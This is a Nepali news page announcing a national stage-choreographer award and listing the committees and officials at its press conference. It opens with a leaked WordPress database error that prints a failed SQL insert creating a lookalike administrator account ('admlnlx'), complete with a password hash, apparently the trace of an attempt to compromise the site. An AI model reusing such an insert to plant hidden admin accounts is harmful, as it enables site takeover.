WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6nts/MotaA4WvhtLbLBrWq8XW9aSl/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-03 02:32:51', '', 'admlnlx', 'admlnlx')
काठमाडौ । एनडिए नृत्य निर्देशक अवार्ड-२०८० आयोजना हुने भएको छ । शनिबार पत्रकार सम्मेलन गरि उक्त कार्यक्रमको घोषणा गरेको हो ।
नेपाल कै पहिलो रङ्गमञ्च (स्टेज) को नृत्य निर्देशक हरुको लागि यस अवार्ड कार्यक्रम आयोजना गरिएको आयोजकले पत्रकार सम्मेलनमा जानकारी गराए । करिव ३ दर्जन भन्दा बढी चलनचल्तीमा रहेको लोक नृत्यको बिधालाइ समेटेर कार्यक्रम आयोजना गरिएको हो । नेपाल भरका नृत्य निर्देशक हरुको उल्लेखनिय सहभागी हुने यस अवार्ड कार्यक्रमलाइ नृत्य निर्देशक संघ नेपालका विभिन्न कमिटीहरुले समन्वय गरिने भएको छ ।
कोशी प्रदेशको झापा, मोरङ र सुनसरी, लुम्बिनी प्रदेश भित्र नृत्य निर्देशक संघ लुम्बिनी प्रदेश कमिटी लगायतका जिल्ला, नगर कमिटी नृत्य निर्देशक संघ नेपाल गण्डकी प्रदेशकमिटी, नृत्य निर्देशक संघ नेपाला भक्तपुर, ललितपुर, काठमाडौं जिल्ला कमिटी, काभ्रे बनेपा जिल्ला कमिटी, डि-डान गोकर्णेस्वर नगर कमिटी, तार्केस्वर नगर कमिटी, चन्द्रागिरी नगर कमिटी, अमर कला केन्द्र कालिमाटी, शिखर छाहारी सास्कृतिक कला केन्द्र बेसिगाउ, फ्रेण्डशिप डान्स स्टुडियो जोरपाटी, एनडिए कार्यलय कपन जस्ता बिविध स्थान फारम उपलन्ध हुने जानकारी पनि आयोजक सस्थाको अध्ययक्ष देवराज गुरुङ ले बताए ।
कार्यक्रममा डिडान केन्द्रिय सह-कोषाध्यक्ष केशव कोइराला, भक्तपुर जिल्ला अध्यक्ष चुडामणी फुयाल, ललितपुर जिल्ला अध्यक्ष प्रदिप रमण सिं डङ्गोल, चन्द्रागिरी नगर कमिटी अध्यक्ष कृष्ण राना, गोकर्णेस्वर नगर कमिटी अध्यक्ष बाबू सेन्चुरी, काठमाडौं जिल्ला का.वा. अध्यक्ष महेश थापा लगायत दर्जनौ नृत्य निर्देशक सहभागी भएको थियो |